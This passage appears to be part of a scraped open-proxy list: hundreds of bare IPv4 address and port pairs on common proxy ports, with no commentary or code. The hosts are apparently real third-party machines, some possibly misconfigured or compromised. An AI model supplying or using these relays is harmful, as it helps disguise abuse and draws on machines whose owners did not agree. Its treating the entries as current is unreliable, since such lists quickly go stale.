186.88.176.73:8080 186.88.182.129:8080 186.88.194.180:8080 186.88.207.11:9064 186.88.225.152:8080 186.88.227.8:8080 186.88.228.136:8080 186.88.228.67:8080 186.88.230.9:9064 186.88.239.92:8080 186.88.240.81:8080 186.88.242.65:9064 186.88.243.242:8080 186.88.34.175:8080 186.88.38.171:8080 186.88.39.253:8080 186.88.4.61:8080 186.88.42.126:8080 186.88.45.10:9064 186.88.47.198:8080 186.88.48.88:9064 186.88.51.194:8080 186.88.57.8:8080 186.88.74.228:8080 186.88.91.176:8080 186.88.97.133:9064 186.88.99.19:8080 186.89.101.13:8080 186.89.104.32:9064 186.89.115.172:9064 186.89.124.120:8080 186.89.127.102:9064 186.89.127.230:9064 186.89.151.23:9064 186.89.151.35:9064 186.89.158.222:8080 186.89.159.225:8080 186.89.176.76:8080 186.89.177.149:8080 186.89.179.233:9064 186.89.191.252:8080 186.89.199.33:8080 186.89.20.95:9064 186.89.209.200:8080 186.89.216.139:8080 186.89.217.57:8080 186.89.217.73:9064 186.89.22.188:8080 186.89.221.20:8080 186.89.221.29:8080 186.89.24.224:8080 186.89.250.117:8080 186.89.255.46:8080 186.89.28.127:8080 186.89.63.4:9064 186.89.65.222:8080 186.89.69.177:8080 186.89.71.204:8080 186.89.73.66:8080 186.90.109.22:8080 186.90.115.43:8080 186.90.124.165:9064 186.90.127.176:9064 186.90.158.35:9064 186.90.242.43:9064 186.90.25.86:8080 186.90.253.220:9064 186.90.29.244:8080 186.90.49.97:8080 186.90.55.37:8080 186.90.56.130:9064 186.90.58.196:8080 186.90.59.209:9064 186.90.60.216:9064 186.90.68.30:9064 186.90.71.22:9064 186.90.73.236:8080 186.90.74.16:9064 186.90.75.146:9064 186.90.76.204:8080 186.90.77.130:9064 186.90.83.43:9064 186.90.88.70:9064 186.91.104.32:9064 186.91.110.86:9064 186.91.156.133:9064 186.91.156.236:9064 186.91.161.130:9064 186.91.161.225:8080 186.91.162.186:8080 186.91.167.110:9064 186.91.169.137:9064 186.91.170.131:8080 186.91.193.19:9064 186.91.197.106:9064 186.91.197.47:8080 186.91.198.157:8080 186.91.198.92:9064 186.91.200.87:8080 186.91.207.159:8080 186.91.212.68:8080 186.91.221.239:8080 186.91.223.18:9064 186.91.227.76:8080 186.91.235.241:8080 186.91.239.100:8080 186.91.246.121:8080 186.91.250.41:8080 186.91.253.106:8080 186.91.253.135:8080 186.91.255.148:9064 186.91.32.235:9064 186.91.34.224:8080 186.91.35.75:9064 186.91.36.46:8080 186.91.43.170:8080 186.91.43.94:9064 186.91.66.80:9064 186.91.70.242:9064 186.91.73.144:8080 186.91.74.45:8080 186.91.76.214:8080 186.91.76.96:8080 186.91.78.116:8080 186.91.99.31:9064 186.92.1.65:8080 186.92.101.100:9064 186.92.103.104:9064 186.92.115.166:9064 186.92.118.212:9064 186.92.120.121:8080 186.92.122.43:9064 186.92.125.233:8080 186.92.132.171:8080 186.92.133.1:9064 186.92.135.252:9064 186.92.163.79:8080 186.92.164.209:9064 186.92.166.36:9064 186.92.17.230:9064 186.92.182.6:9064 186.92.186.190:9064 186.92.195.241:8080 186.92.195.55:9064 186.92.198.106:9064 186.92.198.197:9064 186.92.213.187:9064 186.92.237.95:8080 186.92.240.6:8080 186.92.241.146:8080 186.92.243.82:8080 186.92.248.229:9064 186.92.250.53:8080 186.92.26.15:9064 186.92.27.237:8080 186.92.30.156:9064 186.92.31.157:8080 186.92.35.100:8080 186.92.50.140:9064 186.92.59.30:8080 186.92.6.167:8080 186.92.62.10:9064 186.92.62.142:9064 186.92.66.91:8080 186.92.85.22:9064 186.92.88.33:9064 186.93.106.173:8080 186.93.109.44:8080 186.93.120.181:8080 186.93.120.216:8080 186.93.121.59:9064 186.93.131.117:9064 186.93.133.224:8080 186.93.135.227:9064 186.93.138.33:8080 186.93.145.61:8080 186.93.161.218:9064 186.93.162.218:9064 186.93.163.66:9064 186.93.165.111:9064 186.93.165.87:8080 186.93.166.54:8080 186.93.17.168:9064 186.93.171.40:8080 186.93.185.100:8080 186.93.19.128:9064 186.93.192.92:8080 186.93.193.144:8080 186.93.193.227:9064 186.93.193.65:8080 186.93.194.164:9064 186.93.198.190:8080 186.93.199.94:9064 186.93.206.54:9064 186.93.217.19:8080 186.93.23.126:8080 186.93.230.109:9064 186.93.25.170:9064 186.93.26.236:9064 186.93.26.5:9064 186.93.27.25:8080 186.93.28.60:8080 186.93.41.15:8080 186.93.43.116:9064 186.93.43.190:8080 186.93.56.171:9064 186.93.59.21:9064 186.93.59.58:9064 186.93.64.190:8080 186.93.73.187:9064 186.93.73.46:8080 186.93.77.142:8080 186.93.79.9:9064 186.93.91.226:8080 186.93.96.76:9064 186.93.96.99:9064 186.93.99.155:8080 186.94.101.97:9064 186.94.112.66:8080 186.94.112.77:9064 186.94.115.194:9064 186.94.116.136:9064 186.94.117.132:8080 186.94.117.155:8080 186.94.119.68:9064 186.94.120.151:9064 186.94.124.82:8080 186.94.128.184:8080 186.94.128.76:8080 186.94.144.112:9064 186.94.148.39:9064 186.94.149.224:8080 186.94.149.58:8080 186.94.151.55:8080 186.94.157.78:8080 186.94.164.123:8080 186.94.164.69:9064 186.94.176.130:9064 186.94.188.194:9064 186.94.190.5:8080 186.94.203.156:8080 186.94.210.216:9064 186.94.212.208:9064 186.94.216.73:9064 186.94.217.202:9064 186.94.221.147:9064 186.94.221.223:8080 186.94.23.224:8080 186.94.236.196:8080 186.94.238.248:8080 186.94.241.14:9064 186.94.241.208:9064 186.94.241.229:8080 186.94.245.13:9064 186.94.248.198:9064 186.94.25.10:9064 186.94.250.103:9064 186.94.255.27:9064 186.94.26.14:8080 186.94.39.119:9064 186.94.49.16:8080 186.94.50.100:8080 186.94.50.239:9064 186.94.51.131:8080 186.94.51.180:8080 186.94.55.32:8080 186.94.57.70:9064 186.94.58.121:8080 186.94.60.244:9064 186.94.80.205:8080 186.94.80.238:8080 186.94.80.35:8080 186.94.82.124:8080 186.94.83.4:9064 186.94.84.123:8080 186.94.86.121:9064 186.94.86.122:8080 186.94.91.154:8080 186.94.92.144:9064 186.94.92.168:8080 186.94.93.17:8080 186.94.95.15:9064 186.95.11.33:9064 186.95.115.216:9064 186.95.123.198:9064 186.95.13.130:9064 186.95.14.220:9064 186.95.144.86:9064 186.95.168.224:8080 186.95.169.21:9064 186.95.170.178:9064 186.95.171.115:8080 186.95.173.115:8080 186.95.175.125:9064 186.95.176.65:9064 186.95.177.133:9064 186.95.18.229:8080 186.95.18.55:9064 186.95.186.228:8080 186.95.19.154:9064 186.95.192.17:9064 186.95.193.162:8080 186.95.194.220:9064 186.95.221.205:8080 186.95.225.105:9064 186.95.226.92:9064 186.95.23.20:9064 186.95.230.124:9064 186.95.230.54:8080 186.95.235.121:8080 186.95.235.68:9064 186.95.238.106:8080 186.95.241.203:8080 186.95.255.75:8080 186.95.27.164:9064 186.95.3.80:9064 186.95.34.121:9064 186.95.35.217:8080 186.95.38.88:8080 186.95.39.116:8080 186.95.40.111:9064 186.95.42.21:8080 186.95.42.248:9064 186.95.43.163:9064 186.95.47.168:9064 186.95.50.138:8080 186.95.50.204:8080 186.95.53.234:9064 186.95.71.25:8080 186.95.72.208:9064 186.95.73.90:9064 186.95.78.218:8080 186.95.78.33:9064 186.95.80.222:9064 186.95.83.155:9064 186.95.97.145:9064 187.115.153.138:3128 187.157.45.114:8080 187.27.8.62:9064 187.28.188.197:8080 187.44.14.156:8080 187.62.213.241:8080 187.72.142.210:3128 187.73.16.114:8080 187.73.17.1:8080 187.73.240.103:3128 188.131.129.250:13076 188.131.135.150:13076 188.131.141.49:13076 188.131.200.101:13076 188.138.247.175:8080 188.252.7.83:8080 189.113.64.126:8080 189.123.98.49:9064 189.17.66.162:8080 189.47.216.134:3128 189.48.102.123:9064 189.55.25.156:9064 189.58.105.83:3128 189.59.9.218:8080 189.85.18.13:8080 190.120.248.237:9064 190.121.148.199:8080 190.121.158.114:8080 190.124.155.198:9064 190.128.170.18:8080 190.140.172.193:3128 190.142.114.11:9064 190.142.173.7:9064 190.142.247.169:9064 190.142.5.42:9064 190.147.68.63:9064 190.153.100.150:8080 190.153.38.152:8080 190.153.99.227:8080 190.183.67.153:9064 190.198.10.35:8080 190.198.102.154:9064 190.198.102.168:9064 190.198.103.110:8080 190.198.103.207:9064 190.198.116.36:8080 190.198.117.250:9064 190.198.118.129:9064 190.198.118.61:9064 190.198.121.66:8080 190.198.122.200:9064 190.198.127.14:8080 190.198.145.148:8080 190.198.147.108:8080 190.198.148.166:9064 190.198.151.11:9064 190.198.151.184:9064 190.198.152.147:9064 190.198.152.180:8080 190.198.154.34:8080 190.198.154.43:9064 190.198.156.130:8080 190.198.156.77:9064 190.198.158.129:9064 190.198.159.116:9064 190.198.159.211:8080 190.198.168.119:9064 190.198.177.241:8080 190.198.178.107:9064 190.198.180.71:8080 190.198.181.77:9064 190.198.182.199:8080 190.198.183.120:8080 190.198.183.17:9064 190.198.185.11:9064 190.198.187.131:9064 190.198.191.128:8080 190.198.22.83:8080 190.198.229.34:9064 190.198.237.167:9064 190.198.239.239:8080 190.198.24.169:8080 190.198.249.39:8080 190.198.27.65:9064 190.198.28.228:9064 190.198.33.194:8080 190.198.36.21:9064 190.198.47.142:8080 190.198.65.62:9064 190.198.7.25:9064 190.198.80.142:8080 190.198.86.241:8080 190.198.91.225:9064 190.199.137.101:8080 190.199.144.212:9064 190.199.167.187:9064 190.199.197.146:8080 190.199.200.1:8080 190.199.201.62:8080 190.199.206.241:9064 190.199.210.135:9064 190.199.223.36:9064 190.199.231.177:8080 190.199.241.156:9064 190.199.241.233:9064 190.199.244.190:8080 190.199.250.199:9064 190.199.35.65:9064 190.199.35.99:9064 190.199.41.173:8080 190.199.61.209:9064 190.199.61.26:8080 190.199.61.65:8080 190.199.90.204:9064 190.199.91.127:8080 190.200.0.71:8080 190.200.147.29:9064 190.200.149.231:8080 190.200.155.91:8080 190.200.176.180:9064 190.200.182.22:9064 190.200.189.228:8080 190.200.19.47:8080 190.200.190.178:8080 190.200.2.183:8080 190.200.224.84:9064 190.200.225.15:8080 190.200.225.150:9064 190.200.23.166:9064 190.200.236.159:8080 190.200.237.71:8080 190.200.237.97:9064 190.200.239.117:8080 190.200.242.76:9064 190.200.246.105:8080 190.200.248.179:9064 190.200.248.81:8080 190.200.252.221:8080 190.200.255.239:8080 190.200.38.134:8080 190.200.4.81:9064 190.200.55.118:9064 190.200.58.75:9064 190.200.6.242:8080 190.200.62.182:9064 190.201.0.136:8080 190.201.107.233:9064 190.201.108.244:9064 190.201.109.196:9064 190.201.111.114:8080 190.201.115.142:8080 190.201.120.248:9064 190.201.121.222:9064 190.201.126.238:8080 190.201.142.182:8080 190.201.143.103:8080 190.201.164.81:9064 190.201.166.247:8080 190.201.170.26:8080 190.201.172.241:9064 190.201.172.254:8080 190.201.174.191:8080 190.201.187.235:8080 190.201.198.175:9064 190.201.199.11:8080 190.201.202.74:9064 190.201.219.202:8080 190.201.237.17:9064 190.201.27.2:8080 190.201.35.96:9064 190.201.5.45:9064 190.201.56.38:9064 190.202.195.46:8080 190.202.198.17:8080 190.202.216.231:9064 190.202.221.246:8080 190.202.248.152:8080 190.202.249.56:8080 190.202.253.173:8080 190.203.0.152:9064 190.203.106.179:8080 190.203.130.76:9064 190.203.131.202:9064 190.203.134.130:9064 190.203.14.177:8080 190.203.142.182:8080 190.203.142.86:8080 190.203.164.177:8080 190.203.169.181:8080 190.203.173.212:8080 190.203.19.182:8080 190.203.195.114:8080 190.203.195.247:9064 190.203.195.50:9064 190.203.198.180:9064 190.203.211.143:9064 190.203.211.5:8080 190.203.23.44:8080 190.203.238.8:8080 190.203.40.137:8080 190.203.49.119:9064 190.203.50.172:8080 190.203.67.35:9064 190.203.76.186:8080 190.203.77.38:8080 190.203.78.207:8080 190.203.8.212:9064 190.203.82.22:8080 190.203.86.146:8080 190.203.9.30:8080 190.204.1.16:8080 190.204.10.248:9064 190.204.10.9:9064 190.204.100.30:8080 190.204.104.9:9064 190.204.106.153:8080 190.204.108.189:8080 190.204.111.139:8080 190.204.114.250:8080 190.204.115.71:8080 190.204.130.118:9064 190.204.132.142:9064 190.204.141.28:9064 190.204.143.156:9064 190.204.150.137:9064 190.204.16.141:9064 190.204.168.149:9064 190.204.172.219:8080 190.204.173.59:9064 190.204.18.197:8080 190.204.195.154:8080 190.204.239.66:8080 190.204.252.38:8080 190.204.4.103:9064 190.204.4.52:8080 190.204.41.156:9064 190.204.48.167:9064 190.204.50.113:9064 190.204.52.1:8080 190.204.53.234:8080 190.204.56.59:9064 190.204.67.20:9064 190.204.67.86:9064 190.204.7.163:9064 190.204.81.207:8080 190.204.84.18:8080 190.204.85.5:8080 190.204.86.17:8080 190.204.91.151:9064 190.204.97.135:8080 190.204.98.185:8080 190.205.112.13:9064 190.205.116.179:9064 190.205.120.5:8080 190.205.128.174:8080 190.205.146.180:8080 190.205.151.100:8080 190.205.151.110:8080 190.205.158.75:8080 190.205.158.98:9064 190.205.192.90:8080 190.205.194.167:8080 190.205.198.52:8080 190.205.199.183:9064 190.205.20.234:9064 190.205.208.203:8080 190.205.21.104:8080 190.205.210.198:9064 190.205.210.248:9064 190.205.213.44:8080 190.205.216.215:8080 190.205.217.173:8080 190.205.22.199:8080 190.205.226.147:8080 190.205.231.224:9064 190.205.255.65:8080 190.205.28.119:8080 190.205.29.68:8080 190.206.10.145:9064 190.206.10.201:9064 190.206.100.208:9064 190.206.116.112:8080 190.206.116.39:9064 190.206.117.198:9064 190.206.117.96:8080 190.206.124.122:8080 190.206.134.125:8080 190.206.140.7:8080 190.206.141.150:8080 190.206.143.104:9064 190.206.143.150:8080 190.206.154.138:9064 190.206.156.140:9064 190.206.158.58:8080 190.206.177.143:9064 190.206.204.30:9064 190.206.210.119:9064 190.206.210.153:8080 190.206.210.245:9064 190.206.210.60:8080 190.206.211.227:8080 190.206.211.239:9064 190.206.211.43:9064 190.206.213.71:9064 190.206.221.197:9064 190.206.226.38:8080 190.206.3.250:9064 190.206.33.234:9064 190.206.35.69:8080 190.206.54.11:9064 190.206.58.180:9064 190.206.64.109:9064 190.206.87.59:8080 190.206.88.235:9064 190.206.91.76:9064 190.206.93.53:8080 190.207.1.250:9064 190.207.102.51:9064 190.207.104.137:9064 190.207.110.84:8080 190.207.122.40:8080 190.207.127.25:9064 190.207.138.23:9064 190.207.140.171:8080 190.207.154.111:8080 190.207.159.150:8080 190.207.159.183:8080 190.207.160.159:9064 190.207.162.153:9064 190.207.163.88:8080 190.207.163.95:8080 190.207.175.116:8080 190.207.182.172:8080 190.207.183.241:8080 190.207.185.170:8080 190.207.185.180:9064 190.207.191.213:8080 190.207.195.247:9064 190.207.201.142:9064 190.207.201.167:9064 190.207.201.78:8080 190.207.203.98:8080 190.207.205.146:8080 190.207.219.160:9064 190.207.223.8:9064 190.207.224.247:9064 190.207.225.60:8080 190.207.225.97:8080 190.207.228.112:8080 190.207.228.179:8080 190.207.228.3:9064 190.207.229.147:9064 190.207.251.253:8080 190.207.3.51:9064 190.207.3.88:9064 190.207.5.232:9064 190.207.67.236:9064 190.207.7.220:9064 190.207.7.251:9064 190.207.74.127:9064 190.207.85.47:8080 190.209.69.190:9064 190.217.164.197:9064 190.221.29.214:8080 190.228.33.114:8080 190.36.107.226:9064 190.36.113.17:9064 190.36.141.28:8080 190.36.143.231:8080 190.36.179.31:9064 190.36.21.37:8080 190.36.211.224:8080 190.36.218.233:9064 190.36.22.105:9064 190.36.220.65:9064 190.36.235.251:9064 190.36.238.254:9064 190.36.27.222:9064 190.36.31.104:9064 190.36.80.54:9064 190.36.81.12:9064 190.36.81.42:9064 190.37.125.109:9064 190.37.166.20:8080 190.37.174.156:9064 190.37.38.64:9064 190.37.41.88:9064 190.37.43.79:8080 190.37.65.16:9064 190.37.72.4:9064 190.37.75.211:9064 190.37.90.239:8080 190.38.0.219:9064 190.38.112.96:9064 190.38.118.248:9064 190.38.154.160:9064 190.38.160.87:8080 190.38.166.178:8080 190.38.166.34:8080 190.38.176.97:8080 190.38.178.91:9064 190.38.189.61:8080 190.38.21.244:9064 190.38.25.185:9064 190.38.35.100:9064 190.38.49.164:9064 190.38.50.78:9064 190.38.51.127:9064 190.38.64.191:9064 190.38.65.220:8080 190.38.80.37:9064 190.38.85.167:8080 190.38.95.253:9064 190.39.100.107:9064 190.39.106.190:9064 190.39.109.229:9064 190.39.118.33:9064 190.39.126.75:9064 190.39.140.223:8080 190.39.141.202:9064 190.39.143.223:8080 190.39.146.156:8080 190.39.146.81:8080 190.39.242.188:9064 190.39.243.167:9064 190.39.243.214:9064 190.39.245.28:9064 190.39.249.171:9064 190.39.42.18:9064 190.39.42.50:9064 190.39.75.142:9064 190.39.80.85:9064 190.39.81.54:9064 190.39.82.246:9064 190.39.84.224:9064 190.40.123.35:8080 190.7.129.204:3128 190.72.101.125:9064 190.72.11.203:9064 190.72.134.57:8080 190.72.137.188:9064 190.72.159.60:9064 190.72.176.31:8080 190.72.224.205:9064 190.72.241.227:9064 190.72.31.73:9064 190.72.31.92:9064 190.73.104.232:8080 190.73.109.6:9064 190.73.111.71:8080 190.73.124.34:8080 190.73.128.73:8080 190.73.131.80:9064 190.73.131.91:9064 190.73.134.113:9064 190.73.136.89:8080 190.73.138.249:9064 190.73.152.131:8080 190.73.155.179:9064 190.73.155.67:9064 190.73.171.197:8080 190.73.172.132:8080 190.73.194.198:8080 190.73.201.68:9064 190.73.226.84:9064 190.73.234.98:9064 190.73.252.120:8080 190.73.33.246:9064 190.73.34.187:8080 190.73.37.50:8080 190.73.42.217:8080 190.73.46.226:9064 190.73.64.94:8080 190.73.79.174:8080 190.73.8.132:9064 190.74.127.103:8080 190.74.168.149:8080 190.74.184.136:9064 190.74.188.75:9064 190.74.191.69:8080 190.74.202.207:9064 190.74.210.215:9064 190.74.57.215:9064 190.74.85.221:9064 190.75.131.113:9064 190.75.194.53:8080 190.75.50.30:8080 190.75.63.121:9064 190.75.67.191:9064 190.75.96.113:9064 190.77.116.225:9064 190.77.15.108:8080 190.77.170.249:8080 190.77.185.158:9064 190.77.191.13:9064 190.77.201.73:9064 190.77.204.21:8080 190.77.211.25:9064 190.77.215.19:9064 190.77.215.7:9064 190.77.219.23:8080 190.77.242.82:9064 190.77.243.170:8080 190.77.36.238:8080 190.77.47.238:9064 190.77.91.125:9064 190.77.91.55:9064 190.78.108.101:8080 190.78.125.189:9064 190.78.136.150:8080 190.78.149.225:9064 190.78.158.185:9064 190.78.168.187:9064 190.78.170.45:9064 190.78.179.233:9064 190.78.180.208:8080 190.78.180.50:9064 190.78.183.186:9064 190.78.21.161:9064 190.78.23.59:9064 190.78.28.65:8080 190.78.28.75:9064 190.78.31.194:8080 190.78.44.220:8080 190.78.54.242:8080 190.78.80.8:9064 190.78.87.48:9064 190.78.88.134:9064 190.78.94.10:9064 190.79.129.53:9064 190.79.34.206:8080 190.79.38.154:9064 190.79.41.240:9064 190.79.43.24:9064 190.79.45.164:9064 190.79.48.177:9064 190.79.49.220:9064 190.79.49.34:9064 190.79.93.204:8080 190.85.37.90:3128 190.94.253.68:9064 191.103.46.97:9064 192.241.189.103:3128 192.241.189.130:8080 192.3.104.245:80 192.99.140.228:7808 192.99.140.228:8089 192.99.168.198:8080 193.107.4.105:6666 193.107.4.125:6666 193.107.4.177:6666 193.150.13.87:3128 194.210.156.150:9064 194.210.179.66:9064 194.84.157.1:8080 195.114.125.81:8080 195.151.218.237:8080 195.154.233.59:3128 195.175.201.170:8080 195.46.164.155:3128 196.28.251.222:3128 196.45.51.27:8080 197.231.248.91:80 197.253.1.3:8080 198.2.253.9:3128 198.50.149.189:8888 198.81.200.145:80 199.200.120.140:7808 199.200.120.140:8089 2.135.237.210:9090 2.135.237.228:9090 200.109.196.126:8080 200.109.223.100:8080 200.109.35.220:9064 200.109.42.225:9064 200.122.103.84:9064 200.123.162.45:8080 200.16.117.62:80 200.174.182.105:8080 200.183.192.243:8088 200.195.171.226:3128 200.29.67.29:80 200.42.89.242:8080 200.69.141.18:8080 200.8.149.115:9064 200.8.149.5:9064 200.8.251.194:9064 200.82.192.251:8080 200.82.203.52:9064 200.82.217.69:9064 200.84.148.151:9064 200.84.151.160:9064 200.84.227.128:9064 200.84.234.178:8080 200.84.34.177:9064 200.84.45.170:8080 200.84.46.231:8080 200.84.99.3:9064 200.90.65.106:9064 200.90.67.235:9064 200.90.69.205:9064 200.93.107.192:9064 200.93.17.43:9064 200.93.67.6:8080 200.93.70.15:9064 200.93.87.25:8080 200.93.89.132:9064 200.93.94.91:8080 200.99.150.72:8080 201.13.87.37:9064 201.208.109.151:9064 201.208.111.205:8080 201.208.132.234:9064 201.208.133.29:9064 201.208.164.59:8080 201.208.167.79:8080 201.208.234.159:9064 201.208.5.73:9064 201.209.13.245:8080 201.209.202.95:9064 201.209.220.92:9064 201.209.226.37:9064 201.209.228.71:9064 201.209.23.231:8080 201.209.233.115:8080 201.209.234.30:9064 201.209.36.51:9064 201.209.37.124:8080 201.209.44.82:9064 201.209.5.138:9064 201.209.63.95:9064 201.209.79.145:9064 201.209.81.62:8080 201.210.127.89:9064 201.210.248.68:9064 201.210.255.140:9064 201.210.71.68:9064 201.210.98.194:9064 201.211.103.199:8080 201.211.136.148:8080 201.211.136.75:9064 201.211.143.98:8080 201.211.204.59:8080 201.211.224.66:9064 201.211.227.227:9064 201.212.23.137:9064 201.221.132.22:8080 201.221.132.69:3128 201.242.139.183:8080 201.242.155.54:8080 201.242.232.175:8080 201.242.27.37:9064 201.242.39.120:9064 201.242.42.111:9064 201.242.54.89:8080 201.243.102.246:8080 201.243.106.10:8080 201.243.108.244:8080 201.243.132.253:8080 201.243.144.174:9064 201.243.145.237:8080 201.243.150.230:9064 201.243.155.40:9064 201.243.162.106:9064 201.243.175.131:8080 201.243.176.128:8080 201.243.176.168:9064 201.243.180.234:8080 201.243.186.199:8080 201.243.189.154:8080 201.243.202.44:9064 201.243.203.111:8080 201.248.10.77:9064 201.248.115.161:8080 201.248.22.78:8080 201.248.235.242:9064 201.248.96.97:9064 201.248.99.165:9064 201.251.156.17:8080 201.30.215.194:3128 201.43.162.91:9064 201.62.93.87:3128 201.65.79.114:3128 201.86.94.166:8080 202.101.96.154:8888 202.106.16.36:3128 202.106.169.228:8080 202.107.233.85:8080 202.153.231.147:8080 202.166.195.113:8080 202.169.53.14:8010 202.171.253.74:82 202.171.253.74:83 202.171.253.74:84 202.171.253.84:86 202.53.254.99:8080 202.53.82.134:8080 202.56.231.117:8080 202.70.2.107:8088 202.75.18.34:8080 202.79.59.110:8080 202.86.216.23:80 203.192.12.148:80 203.192.217.187:9064 203.195.254.184:8888 203.201.170.146:31281 203.202.250.98:3128 203.68.25.62:9064 203.77.246.98:8080 203.90.236.152:3128 203.91.119.42:8080 203.91.121.74:3128 205.129.191.112:80 206.174.165.161:3128 207.108.136.68:443 208.109.119.221:80 208.123.212.170:80 208.83.106.105:9999 209.170.151.142:7808 209.170.151.142:8089 210.101.131.231:8080 210.101.131.231:8081 210.13.105.23:8080 210.14.152.91:80 210.14.152.91:8080 210.14.152.91:88 210.14.152.92:80 210.14.152.92:88 210.65.10.76:3128 211.138.121.36:87 211.138.121.38:80 211.138.121.38:81 211.139.45.253:8123 211.141.128.81:8118 211.144.81.66:18000 211.144.81.69:18000 211.162.0.170:80 212.112.107.254:3128 212.126.99.122:8080 212.200.131.83:80 212.200.131.83:8080 212.224.114.98:3128 212.25.61.158:8080 212.4.137.55:8080 212.91.10.142:8080 213.42.0.190:80 213.92.197.70:80 216.162.24.217:8080 216.218.216.201:7808 216.218.216.201:8089 216.230.144.141:80 217.117.6.21:80 217.168.89.136:80 217.169.215.175:6666 217.172.179.88:13910 217.199.160.78:80 217.21.146.130:8080 218.104.239.12:8118 218.107.217.82:80 218.107.217.82:82 218.108.168.70:80 218.108.168.70:82 218.164.36.61:9064 218.166.33.21:9064 218.201.21.142:80 218.201.42.35:80 218.201.74.121:8123 218.203.13.170:80 218.203.13.172:80 218.203.13.173:80 218.203.13.175:80 218.203.13.176:80 218.203.13.177:80 218.203.13.184:80 218.203.13.185:80 218.204.120.37:8123 218.206.188.247:8123 218.206.83.89:80 218.207.13.134:8123 218.207.16.71:8123 218.207.17.132:8123 218.207.172.236:80 218.207.208.55:8080 218.207.27.19:8123 218.207.27.198:8123 218.207.27.57:8123 218.207.50.117:8123 218.207.50.122:8123 218.207.50.178:8123 218.207.51.109:8123 218.207.51.218:8123 218.207.54.19:8123 218.240.156.82:80 218.28.96.39:3128 218.59.144.120:80 218.59.144.120:81 218.59.144.95:80 218.59.144.95:81 218.65.132.38:80 218.65.132.38:8081 218.7.132.1:8080 218.71.87.209:3128 218.80.232.38:8080 218.90.174.167:3128 219.239.236.49:8888 219.64.181.118:9064 219.85.111.7:9064 219.85.135.52:8088 219.85.166.39:8088 219.85.181.88:9064 219.85.207.206:8088 219.85.246.236:8088 219.90.107.242:9064 219.90.96.206:9064 219.91.239.176:9064 220.129.162.79:9064 220.129.173.157:9064 220.129.242.224:9064 220.129.71.238:9064 220.130.180.53:8080 220.136.157.129:9064 220.136.158.18:8088 220.136.238.152:9064 220.136.29.13:9064 220.136.84.185:9064 220.137.176.23:9064 220.137.243.185:9064 220.141.89.239:9064 220.142.6.120:9064 220.143.11.82:8088 220.143.174.163:9064 220.167.104.175:80 220.231.32.195:3128 221.0.182.5:808 221.10.102.199:81 221.10.102.199:82 221.10.102.199:83 221.130.178.78:8585 221.169.204.3:9064 221.176.14.72:80 221.178.117.210:8123 221.178.118.29:8123 221.178.119.61:8123 221.178.21.240:8123 221.178.22.130:8123 221.178.23.71:8123 221.178.24.214:8123 221.178.25.115:8123 221.178.28.151:8123 221.178.28.200:8123 221.178.28.21:8123 221.178.28.245:8123 221.178.29.13:8123 221.178.31.123:8123 221.178.31.190:8123 221.178.31.50:8123 221.178.32.58:8123 221.178.45.95:8123 221.178.53.114:8123 221.178.53.47:8123 221.178.54.128:8123 221.178.54.137:8123 221.178.54.94:8123 221.178.55.128:8123 221.178.55.165:8123 221.178.55.202:8123 221.178.55.221:8123 221.178.66.219:8123 221.178.75.205:8123 221.178.76.14:8123 221.178.76.158:8123 221.178.77.188:8123 221.178.77.215:8123 221.178.78.168:8123 221.178.79.86:8123 221.178.81.103:8123 221.178.86.3:8123 221.178.87.237:8123 221.178.96.203:8123 221.178.97.122:8123 221.178.97.157:8123 221.178.97.2:8123 221.178.97.251:8123 221.178.98.73:8123 221.178.98.98:8123 221.182.73.213:8123 221.182.75.84:8123 221.183.16.219:80 221.214.221.148:3128 221.5.69.51:80 221.5.69.52:8085 221.7.112.108:80 222.127.242.35:8080 222.128.171.142:4000 222.160.250.237:8585 222.217.221.239:8888 222.217.221.240:8888 222.218.157.233:9999 222.246.232.55:8101 222.29.86.69:3128 222.34.136.60:80 222.45.196.19:8118 222.59.244.14:8118 222.85.1.123:8118 222.85.103.3:81 222.88.236.236:843 222.89.248.101:9999 223.252.33.201:16158 223.252.33.201:16515 223.252.33.201:17130 223.252.33.201:19305 223.252.33.201:24809 223.30.231.94:8080 223.64.142.24:8123 223.64.181.153:8123 223.64.182.52:8123 223.64.19.36:8123 223.64.223.123:8123 223.64.35.119:8123 223.64.38.246:8123 223.64.38.88:8123 223.66.167.134:8123 223.66.183.198:8123 223.66.75.135:8123 223.66.80.251:8123 223.67.159.209:8123 223.67.163.215:8123 223.67.165.120:8123 223.67.165.67:8123 223.67.210.200:8123 223.67.217.52:8123 223.67.217.63:8123 223.67.218.99:8123 223.67.235.39:8123 223.68.14.92:8123 223.68.15.128:8123 223.68.59.101:8123 223.68.6.10:8000 223.82.10.46:8123 223.82.12.106:8123 223.82.12.154:8123 223.82.173.96:8123 223.82.175.116:8123 223.82.204.126:8123 223.82.206.32:8123 223.82.207.247:8123 223.82.216.188:8123 223.82.216.193:8123 223.82.216.218:8123 223.82.217.193:8123 223.82.217.25:8123 223.82.230.26:8123 223.82.232.20:8123 223.82.237.142:8123 223.82.27.149:8123 223.82.36.148:8123 223.82.37.219:8123 223.82.38.126:8123 223.82.42.166:8123 223.82.43.137:8123 223.82.43.143:8123 223.82.44.140:8123 223.82.44.55:8123 223.82.46.117:8123 223.82.46.126:8123 223.82.67.101:8123 223.82.68.154:8123 223.82.68.203:8123 223.82.69.234:8123 223.82.72.110:8123 223.82.79.109:8123 223.82.82.155:8123 223.82.83.16:8123 223.82.87.198:8123 223.82.93.4:8123 223.82.93.56:8123 223.82.95.164:8123 223.83.139.103:8123 223.83.140.182:8123 223.83.141.112:8123 223.83.18.53:8123 223.83.185.216:8123 223.83.186.250:8123 223.83.191.61:8123 223.83.191.96:8123 223.83.197.137:8123 223.83.208.75:8123 223.83.209.48:8123 223.83.212.58:8123 223.83.214.141:8123 223.83.218.181:8123 223.83.221.200:8123 223.83.222.159:8123 223.83.223.165:8123 223.83.227.29:8123 223.83.229.225:8123 223.83.24.229:8123 223.83.26.95:8123 223.83.35.108:8123 223.83.35.5:8123 223.83.37.144:8123 223.83.37.241:8123 223.83.56.188:8123 223.83.56.249:8123 223.83.57.153:8123 223.83.57.197:8123 223.83.58.144:8123 223.83.59.226:8123 223.83.59.49:8123 223.83.62.157:8123 223.83.62.91:8123 223.83.74.85:8123 223.83.77.84:8123 223.83.83.132:8123 223.83.84.208:8123 223.83.84.82:8123 223.84.101.88:8123 223.84.116.215:8123 223.84.12.126:8123 223.84.13.3:8123 223.84.130.147:8123 223.84.130.17:8123 223.84.130.4:8123 223.84.132.119:8123 223.84.134.246:8123 223.84.134.250:8123 223.84.137.157:8123 223.84.139.151:8123 223.84.144.199:8123 223.84.151.142:8123 223.84.155.155:8123 223.84.16.192:8123 223.84.164.25:8123 